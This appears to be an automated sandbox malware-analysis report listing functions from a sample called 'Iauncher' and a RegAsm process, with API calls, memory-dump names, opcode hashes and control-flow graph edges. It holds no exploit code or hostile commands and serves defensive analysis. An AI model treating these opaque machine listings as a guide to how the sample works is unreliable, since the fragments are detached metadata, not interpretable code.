                                                                                                                                                    Function 00575D94 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00575DD4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                    • String ID: InitializeCriticalSectionEx$SV
                                                                                                                                                    • API String ID: 2593887523-44730804
                                                                                                                                                    • Opcode ID: 8c8694658975a6b702c091ce800f87ba47de0a676ef4a2313cf661d4381fc6f4
                                                                                                                                                    • Instruction ID: 5158e83d3eab3248a881c4223b7e1689a1ae63187f46c3dd16342c70fe845ed0
                                                                                                                                                    • Opcode Fuzzy Hash: 8c8694658975a6b702c091ce800f87ba47de0a676ef4a2313cf661d4381fc6f4
                                                                                                                                                    • Instruction Fuzzy Hash: 7AE09232540618BBCB222F61EC0DD9E7F12FB64B61F008011FD1C35160DAB28961FBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00575C1A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Alloc
                                                                                                                                                    • String ID: FlsAlloc$SV
                                                                                                                                                    • API String ID: 2773662609-3610419160
                                                                                                                                                    • Opcode ID: af75b8e8c813980579d55d7d88b55314906bc3455e2661701a8f238933d8b4d7
                                                                                                                                                    • Instruction ID: 291396c900420a76017685ba6190bbf4957a7448f2fa597158d44a793d1a3bc9
                                                                                                                                                    • Opcode Fuzzy Hash: af75b8e8c813980579d55d7d88b55314906bc3455e2661701a8f238933d8b4d7
                                                                                                                                                    • Instruction Fuzzy Hash: 8BE0C231A80B2977C6123391AC0EFAE7D48FB60BA1B554020FD0879140ADE51D41FBD2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:8.9%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:95
                                                                                                                                                    Total number of Limit Nodes:10
                                                                                                                                                    execution_graph 42270 9ed01c 42271 9ed034 42270->42271 42272 9ed08e 42271->42272 42275 4940ad4 42271->42275 42284 4942c08 42271->42284 42276 4940adf 42275->42276 42277 4942c79 42276->42277 42279 4942c69 42276->42279 42309 4940bfc 42277->42309 42293 4942d90 42279->42293 42298 4942e6c 42279->42298 42304 4942da0 42279->42304 42280 4942c77 42280->42280 42287 4942c45 42284->42287 42285 4942c79 42286 4940bfc CallWindowProcW 42285->42286 42289 4942c77 42286->42289 42287->42285 42288 4942c69 42287->42288 42290 4942d90 CallWindowProcW 42288->42290 42291 4942da0 CallWindowProcW 42288->42291 42292 4942e6c CallWindowProcW 42288->42292 42289->42289 42290->42289 42291->42289 42292->42289 42295 4942db4 42293->42295 42294 4942e40 42294->42280 42313 4942e58 42295->42313 42316 4942e48 42295->42316 42299 4942e2a 42298->42299 42300 4942e7a 42298->42300 42302 4942e58 CallWindowProcW 42299->42302 42303 4942e48 CallWindowProcW 42299->42303 42301 4942e40 42301->42280 42302->42301 42303->42301 42306 4942db4 42304->42306 42305 4942e40 42305->42280 42307 4942e58 CallWindowProcW 42306->42307 42308 4942e48 CallWindowProcW 42306->42308 42307->42305 42308->42305 42310 4940c07 42309->42310 42311 494435a CallWindowProcW 42310->42311 42312 4944309 42310->42312 42311->42312 42312->42280 42314 4942e69 42313->42314 42319 4944292 42313->42319 42314->42294 42317 4944292 CallWindowProcW 42316->42317 42318 4942e69 42316->42318 42317->42318 42318->42294 42320 4940bfc CallWindowProcW 42319->42320 42321 49442aa 42320->42321 42321->42314 42322 bbd0b8 42323 bbd0fe 42322->42323 42327 bbd289 42323->42327 42330 bbd298 42323->42330 42324 bbd1eb 42328 bbd2c6 42327->42328 42333 bbc9a0 42327->42333 42328->42324 42331 bbc9a0 DuplicateHandle 42330->42331 42332 bbd2c6 42331->42332 42332->42324 42334 bbd300 DuplicateHandle 42333->42334 42335 bbd396 42334->42335 42335->42328 42336 bbad38 42340 bbae30 42336->42340 42348 bbae20 42336->42348 42337 bbad47 42341 bbae41 42340->42341 42342 bbae64 42340->42342 42341->42342 42356 bbb0b8 42341->42356 42360 bbb0c8 42341->42360 42342->42337 42343 bbae5c 42343->42342 42344 bbb068 GetModuleHandleW 42343->42344 42345 bbb095 42344->42345 42345->42337 42349 bbae41 42348->42349 42351 bbae64 42348->42351 42349->42351 42354 bbb0b8 LoadLibraryExW 42349->42354 42355 bbb0c8 LoadLibraryExW 42349->42355 42350 bbae5c 42350->42351 42352 bbb068 GetModuleHandleW 42350->42352 42351->42337 42353 bbb095 42352->42353 42353->42337 42354->42350 42355->42350 42357 bbb0dc 42356->42357 42359 bbb101 42357->42359 42364 bba870 42357->42364 42359->42343 42361 bbb0dc 42360->42361 42362 bba870 LoadLibraryExW 42361->42362 42363 bbb101 42361->42363 42362->42363 42363->42343 42365 bbb2a8 LoadLibraryExW 42364->42365 42367 bbb321 42365->42367 42367->42359 42368 bb4668 42369 bb4684 42368->42369 42370 bb4696 42369->42370 42372 bb47a0 42369->42372 42373 bb47c5 42372->42373 42377 bb48a1 42373->42377 42381 bb48b0 42373->42381 42378 bb48d7 42377->42378 42380 bb49b4 42378->42380 42385 bb4248 42378->42385 42383 bb48d7 42381->42383 42382 bb49b4 42382->42382 42383->42382 42384 bb4248 CreateActCtxA 42383->42384 42384->42382 42386 bb5940 CreateActCtxA 42385->42386 42388 bb5a03 42386->42388

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 05DA3F50 Relevance: 1.8, Strings: 1, Instructions: 530COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 586 5da3f50-5da3f84 591 5da3f92-5da3fa5 586->591 592 5da3f86-5da3f8f 586->592 593 5da3fab-5da3fae 591->593 594 5da4215-5da4219 591->594 592->591 595 5da3fbd-5da3fc9 593->595 596 5da3fb0-5da3fb5 593->596 597 5da421b-5da422b 594->597 598 5da422e-5da4238 594->598 600 5da3fcf-5da3fe1 595->600 601 5da4253-5da4266 595->601 596->595 597->598 605 5da414d-5da415b 600->605 606 5da3fe7-5da403a 600->606 607 5da4268-5da426a 601->607 608 5da426d-5da426e 601->608 617 5da41e0-5da41e2 605->617 618 5da4161-5da416f 605->618 641 5da404a 606->641 642 5da403c-5da4048 call 5da3c88 606->642 612 5da4271-5da4274 607->612 615 5da426c 607->615 610 5da4270 608->610 611 5da4275-5da4299 608->611 610->612 619 5da429b-5da42a5 611->619 620 5da42a8-5da42d0 611->620 612->611 615->608 623 5da41f0-5da41fc 617->623 624 5da41e4-5da41ea 617->624 621 5da417e-5da418a 618->621 622 5da4171-5da4176 618->622 619->620 643 5da42d6-5da42ef 620->643 644 5da4425-5da4443 620->644 621->601 628 5da4190-5da41bf 621->628 622->621 634 5da41fe-5da420f 623->634 626 5da41ee 624->626 627 5da41ec 624->627 626->623 627->623 645 5da41d0-5da41de 628->645 646 5da41c1-5da41ce 628->646 634->593 634->594 648 5da404c-5da405c 641->648 642->648 659 5da4406-5da441f 643->659 660 5da42f5-5da430b 643->660 661 5da44ae-5da44b8 644->661 662 5da4445-5da4467 644->662 645->594 646->645 657 5da405e-5da4075 648->657 658 5da4077-5da4079 648->658 657->658 663 5da407b-5da4089 658->663 664 5da40c2-5da40c4 658->664 659->643 659->644 660->659 683 5da4311-5da435f 660->683 684 5da44b9-5da44c2 662->684 685 5da4469-5da4485 662->685 663->664 673 5da408b-5da409d 663->673 666 5da40d2-5da40e2 664->666 667 5da40c6-5da40d0 664->667 677 5da410d-5da4110 666->677 678 5da40e4-5da40f2 666->678 667->666 681 5da411b-5da4127 667->681 687 5da409f-5da40a1 673->687 688 5da40a3-5da40a7 673->688 750 5da4113 call 5da48b8 677->750 751 5da4113 call 5da48a8 677->751 691 5da40f4-5da4103 678->691 692 5da4105-5da4108 678->692 681->634 697 5da412d-5da4148 681->697 725 5da4389-5da43ad 683->725 726 5da4361-5da4387 683->726 698 5da44c9-5da44ca 684->698 699 5da44c4-5da44c8 684->699 700 5da44a9-5da44ac 685->700 693 5da40ad-5da40bc 687->693 688->693 689 5da4119 689->681 691->681 692->594 693->664 709 5da4239-5da424c 693->709 697->594 705 5da44cc-5da44ce 698->705 706 5da44d1-5da44d4 698->706 699->698 700->661 701 5da4493-5da4496 700->701 701->684 708 5da4498-5da44a8 701->708 710 5da44d0 705->710 711 5da44d5-5da450a 705->711 706->711 708->700 709->601 710->706 723 5da452a-5da4568 711->723 724 5da450c-5da4528 711->724 724->723 738 5da43df-5da43f8 725->738 739 5da43af-5da43c6 725->739 726->725 743 5da43fa 738->743 744 5da4403-5da4404 738->744 747 5da43c8-5da43cb 739->747 748 5da43d2-5da43dd 739->748 743->744 744->659 747->748 748->738 748->739 750->689 751->689
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $q
                                                                                                                                                    • API String ID: 0-1301096350
                                                                                                                                                    • Opcode ID: 75a650d28dca044575ba05d986a16243d28c9ff65e38a7b6c251a4bbea02259e
                                                                                                                                                    • Instruction ID: 9889abd4a53638a3ee4f17a0b70df3ef39d768685ad48d2c7e3c83b714b1fd22
                                                                                                                                                    • Opcode Fuzzy Hash: 75a650d28dca044575ba05d986a16243d28c9ff65e38a7b6c251a4bbea02259e
                                                                                                                                                    • Instruction Fuzzy Hash: 9E128235B002159FDB14DF79D884A6EBBF6BF88710B14816AE406EB365DB71DC42CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAA3D8 Relevance: 1.5, Strings: 1, Instructions: 295COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: lldate
                                                                                                                                                    • API String ID: 0-434904232
                                                                                                                                                    • Opcode ID: d91c401831b6e0086623b35214f7c4985ac6f7c9e03afa132e23743754f41126
                                                                                                                                                    • Instruction ID: fa47a6608bca6d6dcd2781f433b616faa0a7620732673a0501adbc8f5658cb8c
                                                                                                                                                    • Opcode Fuzzy Hash: d91c401831b6e0086623b35214f7c4985ac6f7c9e03afa132e23743754f41126
                                                                                                                                                    • Instruction Fuzzy Hash: 9BD1D334910218CFCB14EFB5D8556ADBBB2FF8A306F5081AAE44AAB354DF319985CF11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAA3E8 Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: lldate
                                                                                                                                                    • API String ID: 0-434904232
                                                                                                                                                    • Opcode ID: 90a543fcafe6dc9f8759154a1fa94310ab6c397acbde18cd57b74afb7e19d293
                                                                                                                                                    • Instruction ID: b4da2f82f67a86ad47548fb5d56e80751fb1711af234fae80362bc9f2d1fe370
                                                                                                                                                    • Opcode Fuzzy Hash: 90a543fcafe6dc9f8759154a1fa94310ab6c397acbde18cd57b74afb7e19d293
                                                                                                                                                    • Instruction Fuzzy Hash: 53D1D234910218CFCB14EFB5D8556ADBBB2FF8A306F5081AAE44AAB254DF319985CF11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA67D8 Relevance: .6, Instructions: 563COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 12186df75bc4110326acd1d33c8db9d7c627982ab1a393e1e846e916295cb4ff
                                                                                                                                                    • Instruction ID: cb45a4227ad4a3843db80e3b056103401eca0890eb8c0c658c138e8a61d54ca0
                                                                                                                                                    • Opcode Fuzzy Hash: 12186df75bc4110326acd1d33c8db9d7c627982ab1a393e1e846e916295cb4ff
                                                                                                                                                    • Instruction Fuzzy Hash: 51227E72A00215DFDB15DF64D880BAEBBF2FF84310F19856AE5059B2A1DB30ED46CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D81070 Relevance: 10.4, Strings: 8, Instructions: 378COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 294 5d81070-5d810b5 299 5d81189-5d8119c 294->299 300 5d810bb-5d810bd 294->300 303 5d811a2-5d811b1 299->303 304 5d81234-5d8123f 299->304 301 5d810c0-5d810cf 300->301 306 5d81129-5d8112d 301->306 307 5d810d1-5d810fe 301->307 314 5d811ff-5d81203 303->314 315 5d811b3-5d811dc 303->315 309 5d81247-5d81250 304->309 310 5d8113c 306->310 311 5d8112f-5d8113a 306->311 329 5d81104-5d81106 307->329 313 5d81141-5d81144 310->313 311->313 313->309 318 5d8114a-5d8114e 313->318 316 5d81212 314->316 317 5d81205-5d81210 314->317 338 5d811de-5d811e4 315->338 339 5d811f4-5d811fd 315->339 323 5d81214-5d81216 316->323 317->323 321 5d8115d 318->321 322 5d81150-5d8115b 318->322 328 5d8115f-5d81161 321->328 322->328 326 5d81218-5d81222 323->326 327 5d81267-5d8127c 323->327 342 5d81225-5d8122e 326->342 351 5d8127e-5d81284 327->351 352 5d81291-5d81294 327->352 332 5d81253-5d81260 328->332 333 5d81167-5d81171 328->333 335 5d81108-5d8110e 329->335 336 5d8111e-5d81127 329->336 332->327 349 5d81174-5d8117e 333->349 340 5d81110 335->340 341 5d81112-5d81114 335->341 336->349 343 5d811e8-5d811ea 338->343 344 5d811e6 338->344 339->342 340->336 341->336 342->303 342->304 343->339 344->339 349->301 353 5d81184 349->353 354 5d81298-5d812af 351->354 355 5d81286-5d81290 351->355 356 5d812c4-5d812c6 352->356 357 5d81296 352->357 353->309 358 5d812c7-5d812e9 354->358 361 5d812b1-5d812b7 354->361 355->352 356->358 357->354 365 5d812ec-5d812f0 358->365 362 5d812b9 361->362 363 5d812bb-5d812bd 361->363 362->358 363->356 366 5d812f9-5d812fe 365->366 367 5d812f2-5d812f7 365->367 368 5d81304-5d81307 366->368 367->368 369 5d814f8-5d81500 368->369 370 5d8130d-5d81322 368->370 370->365 372 5d81324 370->372 373 5d81498-5d814b9 372->373 374 5d8132b-5d81350 372->374 375 5d813e0-5d81405 372->375 381 5d814bf-5d814f3 373->381 387 5d81352-5d81354 374->387 388 5d81356-5d8135a 374->388 385 5d8140b-5d8140f 375->385 386 5d81407-5d81409 375->386 381->365 391 5d81430-5d81453 385->391 392 5d81411-5d8142e 385->392 390 5d8146d-5d81493 386->390 393 5d813b8-5d813db 387->393 394 5d8137b-5d8139e 388->394 395 5d8135c-5d81379 388->395 390->365 411 5d8146b 391->411 412 5d81455-5d8145b 391->412 392->390 393->365 409 5d813a0-5d813a6 394->409 410 5d813b6 394->410 395->393 415 5d813a8 409->415 416 5d813aa-5d813ac 409->416 410->393 411->390 413 5d8145d 412->413 414 5d8145f-5d81461 412->414 413->411 414->411 415->410 416->410
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                                                                                                                    • API String ID: 0-3886557441
                                                                                                                                                    • Opcode ID: b3f6c4ad339cbd6b088e061fc0b15308e14e249d7091ed6a00bcd1d2c1efe853
                                                                                                                                                    • Instruction ID: ad77dacde219df57047c9cb3558273363ba69aee36140b83bef14fe5382394e7
                                                                                                                                                    • Opcode Fuzzy Hash: b3f6c4ad339cbd6b088e061fc0b15308e14e249d7091ed6a00bcd1d2c1efe853
                                                                                                                                                    • Instruction Fuzzy Hash: 0FD19034B006059FEB19ABA9D844A7A7BE7FF88600F15845BE506CB3A6CF74DC06CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D81582 Relevance: 7.8, Strings: 6, Instructions: 333COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 417 5d81582-5d81584 418 5d8158e 417->418 419 5d81598-5d815af 418->419 420 5d815b5-5d815b7 419->420 421 5d815b9-5d815bf 420->421 422 5d815cf-5d815f1 420->422 423 5d815c1 421->423 424 5d815c3-5d815c5 421->424 427 5d81638-5d8163f 422->427 423->422 424->422 428 5d81571-5d81580 427->428 429 5d81645-5d81747 427->429 428->417 432 5d815f3-5d815f7 428->432 433 5d815f9-5d81604 432->433 434 5d81606 432->434 436 5d8160b-5d8160e 433->436 434->436 436->429 439 5d81610-5d81614 436->439 440 5d81623 439->440 441 5d81616-5d81621 439->441 442 5d81625-5d81627 440->442 441->442 444 5d8174a-5d8177c 442->444 445 5d8162d-5d81637 442->445 451 5d8177e-5d81794 444->451 452 5d81795-5d817a7 444->452 445->427 451->452 454 5d817a9-5d817af 452->454 455 5d817bf-5d817e1 452->455 456 5d817b1 454->456 457 5d817b3-5d817b5 454->457 460 5d817e4-5d817e8 455->460 456->455 457->455 461 5d817ea-5d817ef 460->461 462 5d817f1-5d817f6 460->462 463 5d817fc-5d817ff 461->463 462->463 464 5d81abf-5d81ac7 463->464 465 5d81805-5d8181a 463->465 465->460 467 5d8181c 465->467 468 5d818d8-5d8198b 467->468 469 5d81990-5d819bd 467->469 470 5d81823-5d818d3 467->470 471 5d81a07-5d81a2c 467->471 468->460 489 5d819c3-5d819cd 469->489 490 5d81b36-5d81b73 469->490 470->460 485 5d81a2e-5d81a30 471->485 486 5d81a32-5d81a36 471->486 491 5d81a94-5d81aba 485->491 492 5d81a38-5d81a55 486->492 493 5d81a57-5d81a7a 486->493 496 5d81b00-5d81b2f 489->496 497 5d819d3-5d81a02 489->497 491->460 492->491 513 5d81a7c-5d81a82 493->513 514 5d81a92 493->514 496->490 497->460 516 5d81a84 513->516 517 5d81a86-5d81a88 513->517 514->491 516->514 517->514
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $q$$q$$q$$q$$q$$q
                                                                                                                                                    • API String ID: 0-2069967915
                                                                                                                                                    • Opcode ID: 736e329a6c58b634847e1e1b0f945f75d1890a4e2bb81910326ebf3d6cdf5aac
                                                                                                                                                    • Instruction ID: 709b49863b74e2fbef2efbbba26737c7126dc135b5bfe069b0c52139c3fd0b62
                                                                                                                                                    • Opcode Fuzzy Hash: 736e329a6c58b634847e1e1b0f945f75d1890a4e2bb81910326ebf3d6cdf5aac
                                                                                                                                                    • Instruction Fuzzy Hash: 09C1AF34B002019FEB14ABA5C854B3AB7E7FF89600F15845AE5439B3A2DF75EC46CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D80597 Relevance: 1.7, Strings: 1, Instructions: 462COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 752 5d80597-5d80599 753 5d8059b-5d805c7 752->753 754 5d80583-5d80585 752->754 756 5d805cd-5d805fd 753->756 757 5d80ad7-5d80d2e 753->757 755 5d80138-5d80145 754->755 761 5d8076a-5d80774 755->761 762 5d8014b-5d80160 755->762 756->755 762->755 766 5d80162 762->766 769 5d80169-5d8018c 766->769 770 5d803aa-5d803cd 766->770 771 5d8049a-5d804bd 766->771 772 5d801de 766->772 773 5d80251-5d8027f 766->773 774 5d80422-5d80445 766->774 775 5d80512-5d80535 766->775 776 5d802c4-5d802f2 766->776 777 5d80337 766->777 829 5d80192-5d80196 769->829 830 5d80777-5d807a6 769->830 831 5d80819-5d80848 770->831 832 5d803d3-5d803d7 770->832 833 5d8095d-5d8098c 771->833 834 5d804c3-5d804c7 771->834 783 5d801e8-5d80204 772->783 800 5d80281-5d80287 773->800 801 5d80297-5d802bf 773->801 821 5d808bb-5d808ea 774->821 822 5d8044b-5d8044f 774->822 823 5d8053b-5d8053f 775->823 824 5d809ff-5d80a2e 775->824 798 5d8030a-5d80332 776->798 799 5d802f4-5d802fa 776->799 786 5d80341-5d8035d 777->786 793 5d8020a-5d8020c 783->793 796 5d80363-5d80365 786->796 802 5d8020e-5d80214 793->802 803 5d80224-5d8024c 793->803 805 5d8037d-5d803a5 796->805 806 5d80367-5d8036d 796->806 798->755 807 5d802fc 799->807 808 5d802fe-5d80300 799->808 815 5d80289 800->815 816 5d8028b-5d8028d 800->816 801->755 809 5d80218-5d8021a 802->809 810 5d80216 802->810 803->755 805->755 813 5d8036f 806->813 814 5d80371-5d80373 806->814 807->798 808->798 809->803 810->803 813->805 814->805 815->801 816->801 849 5d808f1-5d80920 821->849 835 5d80455-5d8045f 822->835 836 5d80927-5d80956 822->836 837 5d80a6b-5d80ad0 823->837 838 5d80545-5d8054f 823->838 851 5d80a35-5d80a64 824->851 839 5d8019c-5d801a6 829->839 840 5d807e3-5d80812 829->840 860 5d807ad-5d807dc 830->860 862 5d8084f-5d8087e 831->862 841 5d803dd-5d803e7 832->841 842 5d80885-5d808b4 832->842 864 5d80993-5d809c2 833->864 843 5d809c9-5d809f8 834->843 844 5d804cd-5d804d7 834->844 835->849 850 5d80465-5d80495 835->850 836->833 837->757 838->851 852 5d80555-5d80580 838->852 859 5d801ac-5d801d9 839->859 839->860 840->831 861 5d803ed-5d8041d 841->861 841->862 842->821 843->824 863 5d804dd-5d8050d 844->863 844->864 849->836 850->755 851->837 852->754 859->755 860->840 861->755 862->842 863->755 864->843
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ZmPj
                                                                                                                                                    • API String ID: 0-3525819835
                                                                                                                                                    • Opcode ID: 3bc1e2da6cb1ea2d92ab149873fa45e3003b4a06ead42242416247d3344ddf4f
                                                                                                                                                    • Instruction ID: f92fa560ed07128660163b8f600a75068257601a7bb94612055c5c25b4dc9549
                                                                                                                                                    • Opcode Fuzzy Hash: 3bc1e2da6cb1ea2d92ab149873fa45e3003b4a06ead42242416247d3344ddf4f
                                                                                                                                                    • Instruction Fuzzy Hash: FE028D30B007148FEB29AB65D858B3D7AB2FF86700F51895AD5039F3A1CB79ED058B85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00BBAE30 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 960 bbae30-bbae3f 961 bbae6b-bbae6f 960->961 962 bbae41-bbae4e call bb9838 960->962 963 bbae83-bbaec4 961->963 964 bbae71-bbae7b 961->964 969 bbae50 962->969 970 bbae64 962->970 971 bbaed1-bbaedf 963->971 972 bbaec6-bbaece 963->972 964->963 1017 bbae56 call bbb0b8 969->1017 1018 bbae56 call bbb0c8 969->1018 970->961 974 bbaf03-bbaf05 971->974 975 bbaee1-bbaee6 971->975 972->971 973 bbae5c-bbae5e 973->970 976 bbafa0-bbafb7 973->976 977 bbaf08-bbaf0f 974->977 978 bbaee8-bbaeef call bba814 975->978 979 bbaef1 975->979 993 bbafb9-bbb018 976->993 981 bbaf1c-bbaf23 977->981 982 bbaf11-bbaf19 977->982 980 bbaef3-bbaf01 978->980 979->980 980->977 985 bbaf30-bbaf39 call bba824 981->985 986 bbaf25-bbaf2d 981->986 982->981 991 bbaf3b-bbaf43 985->991 992 bbaf46-bbaf4b 985->992 986->985 991->992 994 bbaf69-bbaf76 992->994 995 bbaf4d-bbaf54 992->995 1011 bbb01a-bbb060 993->1011 1002 bbaf99-bbaf9f 994->1002 1003 bbaf78-bbaf96 994->1003 995->994 996 bbaf56-bbaf66 call bba834 call bba844 995->996 996->994 1003->1002 1012 bbb068-bbb093 GetModuleHandleW 1011->1012 1013 bbb062-bbb065 1011->1013 1014 bbb09c-bbb0b0 1012->1014 1015 bbb095-bbb09b 1012->1015 1013->1012 1015->1014 1017->973 1018->973
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00BBB086
                                                                                                                                                    Memory Dump Source
